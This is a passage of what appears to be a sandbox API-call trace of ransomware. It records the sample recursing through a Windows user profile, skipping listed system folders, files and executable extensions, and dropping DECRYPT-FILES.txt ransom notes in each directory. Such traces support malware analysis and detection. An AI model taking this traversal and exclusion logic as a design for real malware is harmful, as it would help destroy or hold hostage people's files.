HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="AhnLab") returned 0x0 [0182.115] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.115] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0182.116] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.116] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\0a16c9.tmp") returned 89 [0182.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.136] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0182.136] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.136] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\DECRYPT-FILES.txt") returned 96 [0182.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.136] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0182.136] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*" [0182.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef949240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef949240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.137] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.137] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef949240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef949240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.137] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.137] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.137] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef949240, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef949240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef949240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.137] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.137] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.137] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.137] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.137] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.137] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.137] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned 78 [0182.137] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.137] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\" [0182.137] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\0a16c9.tmp" [0182.137] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.138] CloseHandle (hObject=0x0) returned 0 [0182.138] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.138] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbb3f60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.138] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.138] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0182.138] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0182.138] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0182.138] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0182.138] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\", lpString2="Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" [0182.138] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Program Files") returned 0x0 [0182.138] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch=":\\Windows") returned 0x0 [0182.138] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Games\\") returned 0x0 [0182.138] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.138] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.138] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.140] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.140] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.140] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\All Users") returned 0x0 [0182.141] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.141] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.141] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.141] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="AhnLab") returned 0x0 [0182.141] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.141] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0182.141] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.141] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\0a16c9.tmp") returned 93 [0182.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0182.141] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0182.141] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.141] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\DECRYPT-FILES.txt") returned 100 [0182.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.142] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0182.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*" [0182.142] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef96f3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef96f3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0182.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.142] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef96f3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef96f3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.142] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.142] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.143] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef96f3a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef96f3a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef96f3a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.143] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.143] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.143] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.143] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.143] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.143] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.143] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 82 [0182.143] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.143] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\" [0182.143] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\0a16c9.tmp" [0182.143] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.143] CloseHandle (hObject=0x0) returned 0 [0182.144] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.144] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbda0c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.144] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.144] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabbda0c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0182.144] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0182.144] CloseHandle (hObject=0x27c) returned 1 [0182.144] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbda0c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbda0c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0182.144] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.144] CloseHandle (hObject=0x274) returned 1 [0182.144] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0182.144] lstrcmpW (lpString1="IETldCache", lpString2=".") returned 1 [0182.144] lstrcmpW (lpString1="IETldCache", lpString2="..") returned 1 [0182.144] lstrcatW (in: lpString1="IETldCache", lpString2="\\" | out: lpString1="IETldCache\\") returned="IETldCache\\" [0182.144] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IETldCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\" [0182.144] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Program Files") returned 0x0 [0182.144] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch=":\\Windows") returned 0x0 [0182.144] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Games\\") returned 0x0 [0182.144] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\All Users") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\IETldCache\\") returned="\\IETldCache\\" [0182.145] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabcbe900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabcbe900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0182.145] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0182.145] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0182.145] lstrcatW (in: lpString1="Libraries", lpString2="\\" | out: lpString1="Libraries\\") returned="Libraries\\" [0182.145] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Program Files") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch=":\\Windows") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Games\\") returned 0x0 [0182.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 